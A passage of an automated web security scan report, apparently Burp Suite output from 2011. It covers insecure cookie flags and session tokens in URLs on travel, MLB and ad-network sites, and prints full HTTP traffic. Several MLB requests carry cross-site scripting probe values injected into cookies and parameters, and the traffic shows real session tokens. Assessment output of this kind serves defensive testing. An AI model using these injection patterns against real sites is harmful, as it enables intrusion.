Referer: https://axptravel.americanexpress.com/consumertravel/customlogin.do?clientid=ACH-ONLINE&target=https://go.americanexpress-travel.com/SSOAuthenticateResponse.do%3fService%3DAMEX%26leavingDate%3D10%2F04%2F11%26returningDate%3D10%2F07%2F11%26searchMode%3Dcity%26city%3DBoston%2C%2520United%2520States%26cityCountryCode%3D%26hotelName%3D%26adults%3D1%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25EF%25BF%25BDid%26WA4%3D%25EF%25BF%25BDid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot%26SSORequestPath%3D/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSID=F117AC921CCE045ED73E1F0312D428B7.p0716; JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Service=AMEX; SID=T0067005500193032003110310400015612061

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:16:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=90DF1362B8BE0812CA054723BD79F759.p0716; Path=/
Location: https://go.americanexpress-travel.com/hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


9.2. https://go.americanexpress-travel.com/hotel/HotelAvailability.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelAvailability.do

Issue detail

The cookie issued by the application (see the Set-Cookie header in the response below) does not have the secure flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelAvailability.do?SEQ=1317600834023922011 HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://go.americanexpress-travel.com/hotel/HotelCobrand.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSID=F117AC921CCE045ED73E1F0312D428B7.p0716; Service=AMEX; SID=T0067005500193032003110310400015612061; JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:16:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=14DD10D7D5064DF95146A9A1D7FADBBB.p0716; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Location: https://go.americanexpress-travel.com/hotel/HotelAvailability.do?SEQ=1317600834023922011
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1


9.3. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The cookie issued by the application (see the Set-Cookie header in the response below) does not have the secure flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...

9.4. https://secure.mlb.com/resetPassword.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Issue detail

The cookie issued by the application (see the Set-cookie header in the response below) does not have the secure flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /resetPassword.do HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

uri=%2Faccount%2Fforgot_password.jsp&emailAddress=*%2F%0Adocument.title%3D1317599291294048%2F*

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:21 GMT
Content-type: text/html;charset=utf-8
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 76221


                       
...[SNIP]...

9.5. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /shared/scripts/bam/bam.env.jsp

Issue detail

The cookie issued by the application (see the Set-cookie header in the response below) does not have the secure flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/scripts/bam/bam.env.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Accept-Language: en-us
Referer: https://secure.mlb.com/resetPassword.do
Accept: */*
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:42 GMT
Expires: Mon, 03 Oct 2011 01:48:42 GMT
Edge-control: max-age=7200
Content-type: text/javascript;charset=ISO-8859-1
Content-length: 811
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/


(function (window, $, bam) {

bam.env = bam.env || {};
bam.env.host = bam.env.host || {};

$.extend(bam.env.host, {

/**
* Returns base url for the CDN server

...[SNIP]...

9.6. https://secure.mlb.com/style/bam.css.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/bam.css.jsp

Issue detail

The cookie issued by the application (see the Set-cookie header in the response below) does not have the secure flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/bam.css.jsp?c_id=%0Adocument.title=1317599335378049; HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:58 GMT
Expires: Mon, 03 Oct 2011 01:48:58 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 9935


/* buttons */
/* global */
.bam-button {
font-family:"Helvetica", "Helvetica Neue", arial, sans-serif;
font-size:13px;
font-weight:bold;
text-decoration:none;
-moz-border-r
...[SNIP]...

9.7. https://secure.mlb.com/style/nav_2011.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The cookie issued by the application (see the Set-cookie header in the response below) does not have the secure flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/nav_2011.jsp?c_id=%0Adocument.title=1317599336102051;&section=schedule HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:59 GMT
Expires: Mon, 03 Oct 2011 01:48:59 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 16918


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...

9.8. https://www.hotelplanner.com/Accept/Reserve.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The cookie issued by the application (see the Set-Cookie headers in the response below) does not have the secure flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

10. Session token in URL
There are 31 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://a.intentmedia.net/adServer/impressions

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://a.intentmedia.net
Path:   /adServer/impressions

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /adServer/impressions?publisher_session_id=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&cache_buster=1317600538540&product_category=hotels&site=TRAVELOCITY&time_zone_offset=300&submarket_id=MA134-0100&rooms=1&travelers=1&ad_unit_id=5&hotel_property_ids=4810_114273_46356_10677_601_41209_48167_28920_4643_25625_12989_1013_13360_64654_44777_9773_11430_10448_46065_32162_20077_1228_12056_34410_9074_202264_620_914_7745_27993_79419_50883_102143_12018_9817_2841_13114_2004_70926_1322_58534_774_12062_48559_26931_2738_15077_44999_52173_3_1747_20114_26186_65482_52374_22259_56985_19411_22479_32159_85128_16231_2844_18685_64276_57481_2837_1213_28041_11122_34000_35409_75432_80723_34758_24713_35992_34361_49791_54902_31216_7256_9239_50684_28588_16565_25026_33473_16477_35131_35054_24709_23560_22574_26118_138019_44277_4680_309_45625_39186_30198_44375_85127_63829_7921_31749_8178_42595_20007_119214_119432_119478_40415_103982_10487_10678_14412_21745_23568_25299_26117_30034_35838_41236_4470_49886_56521_59519_62421_64032_8867_10158_10348_13_25492_27425_54939_6073_18969_119779_119627_44593_62214_8046_33150_111060_64750_144426_138764_139993_121079_123761_124226_141217_45783_60995_80644 HTTP/1.1
Host: a.intentmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:09:04 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI COM NAV INT"
Server: Jetty(6.1.17)
Set-Cookie: intentmedia_user_id=27f4839b-213a-4016-9212-fcfa87390629;Path=/;Expires=Wed, 02-Oct-13 00:09:04 GMT
Via: 1.1 a.intentmedia.net
Content-Length: 259
Connection: keep-alive

try{if (IntentMedia) {IntentMedia.PUBLISHER_REPORTS=false;IntentMedia.MONTHLY_ASAP_BUDGETS=false;IntentMedia.SUPPRESS_CHEAPTICKETS_GLOBAL=true;IntentMedia.SSN_ORBITZ_GLOBAL_SHOW_REVIEWS_TEST=false;Int
...[SNIP]...

10.2. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://rs.gwallet.com/r1/pixel/x1743
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app607
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:49:59 GMT; Path=/
Set-Cookie: cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; Domain=.contextweb.com; Expires=Mon, 01-Oct-2012 23:49:59 GMT; Path=/
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:49:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.3. http://cert.travelocity.com/___waseq.img

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cert.travelocity.com
Path:   /___waseq.img

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /___waseq.img?Log=1&tntPage=http%3A//www.igougo.com/traveldeals/ratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10/04/2011%26endDate%3D10/07/2011&tntTitle=Compare%20Hotel%20Rates%20-%20IgoUgo&tntReferrer=http%3A//www.travelocity.com/popWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&tntCampaignID=24175&tntCampaignName=Host%20Group%20Monitoring%20Campaign%20PROD%20%28Copy%29&tntRecipeID=2&tntRecipeName=Prod&tntTrafficType=0&tntOfferID=19910&tntMbox=RateFinderMboxHotels&tntPCID=1317601622475-177474.19&tntSessionID=1317601622475-177474&tntFirstSession=true&tntPageID=1317601622475-177474&tntTime=1317601629072 HTTP/1.1
Host: cert.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 403 Forbidden
Date: Sun, 02 Oct 2011 22:54:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /___waseq.img
on this server.</p>
<
...[SNIP]...

10.4. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /pixel?nid=chango&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://as.chango.com/links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://gcm.chango.com/collector/relator?id=E1&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:58:03 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 321
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
